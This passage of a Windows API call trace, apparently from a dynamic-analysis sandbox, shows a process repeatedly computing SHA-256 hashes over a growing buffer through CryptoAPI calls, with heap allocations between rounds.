	[0229.976] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e200
	[0229.976] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e200, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e200, pdwDataLen=0x128ba4) returned 1
	[0229.976] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.976] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.976] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.976] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.976] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0229.976] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.976] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e228
	[0229.976] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e228, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e228, pdwDataLen=0x128ba4) returned 1
	[0229.976] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.976] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.976] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.977] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.977] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0229.977] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.977] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e250
	[0229.977] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e250, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e250, pdwDataLen=0x128ba4) returned 1
	[0229.977] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.977] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.977] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.977] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.977] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0229.977] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.977] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e278
	[0229.977] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e278, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e278, pdwDataLen=0x128ba4) returned 1
	[0229.977] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.977] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.977] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.978] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.978] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0229.978] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.978] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e2a0
	[0229.978] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e2a0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e2a0, pdwDataLen=0x128ba4) returned 1
	[0229.978] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.978] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.978] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.978] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.978] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0229.978] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.978] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e2c8
	[0229.978] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e2c8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e2c8, pdwDataLen=0x128ba4) returned 1
	[0229.978] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.978] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.978] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.979] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.979] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0229.979] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.979] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e2f0
	[0229.979] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e2f0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e2f0, pdwDataLen=0x128ba4) returned 1
	[0229.979] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.979] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.979] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.979] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.979] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0229.979] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.980] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e318
	[0229.980] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e318, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e318, pdwDataLen=0x128ba4) returned 1
	[0229.980] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.980] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.980] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.980] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.980] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0229.980] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.980] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e340
	[0229.980] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e340, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e340, pdwDataLen=0x128ba4) returned 1
	[0229.980] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.980] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.980] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.981] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.981] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0229.981] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.981] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e368
	[0229.981] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e368, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e368, pdwDataLen=0x128ba4) returned 1
	[0229.981] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.981] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.981] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.981] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.981] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0229.981] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.981] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e390
	[0229.981] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e390, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e390, pdwDataLen=0x128ba4) returned 1
	[0229.981] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.981] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.981] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.982] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.982] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0229.982] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.982] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e3b8
	[0229.982] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e3b8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e3b8, pdwDataLen=0x128ba4) returned 1
	[0229.982] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.982] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.982] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.982] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.982] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0229.982] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.982] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e3e0
	[0229.982] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e3e0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e3e0, pdwDataLen=0x128ba4) returned 1
	[0229.982] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.982] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.982] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.983] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.983] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0229.983] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.983] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e408
	[0229.983] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e408, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e408, pdwDataLen=0x128ba4) returned 1
	[0229.983] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.983] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.983] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.983] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.983] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0229.983] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.983] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e430
	[0229.983] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e430, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e430, pdwDataLen=0x128ba4) returned 1
	[0229.983] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.983] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.983] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.984] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.984] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0229.984] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.984] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e458
	[0229.984] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e458, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e458, pdwDataLen=0x128ba4) returned 1
	[0229.984] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.984] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.984] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.984] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.984] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0229.984] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.984] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e480
	[0229.984] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e480, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e480, pdwDataLen=0x128ba4) returned 1
	[0229.984] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.984] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.985] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.985] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.985] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0229.985] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.985] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e4a8
	[0229.985] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e4a8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e4a8, pdwDataLen=0x128ba4) returned 1
	[0229.985] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.985] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.985] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.986] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.986] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0229.986] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.986] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e4d0
	[0229.986] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e4d0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e4d0, pdwDataLen=0x128ba4) returned 1
	[0229.986] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.986] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.986] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.986] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.986] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0229.986] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.986] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e4f8
	[0229.986] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e4f8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e4f8, pdwDataLen=0x128ba4) returned 1
	[0229.986] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.986] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.986] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.987] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.987] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0229.987] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.987] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e520
	[0229.987] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e520, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e520, pdwDataLen=0x128ba4) returned 1
	[0229.987] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.987] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.987] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.987] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.987] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0229.987] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.987] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e548
	[0229.987] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e548, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e548, pdwDataLen=0x128ba4) returned 1
	[0229.987] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.987] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.987] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.988] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.988] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0229.988] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.988] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e570
	[0229.988] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e570, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e570, pdwDataLen=0x128ba4) returned 1
	[0229.988] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.988] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.988] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.988] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.988] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0229.988] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.988] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e598
	[0229.988] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e598, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e598, pdwDataLen=0x128ba4) returned 1
	[0229.988] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.988] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.988] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.989] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.989] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0229.989] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.989] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e5c0
	[0229.989] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e5c0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e5c0, pdwDataLen=0x128ba4) returned 1
	[0229.989] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.989] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.989] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.989] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.989] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0229.989] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.989] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e5e8
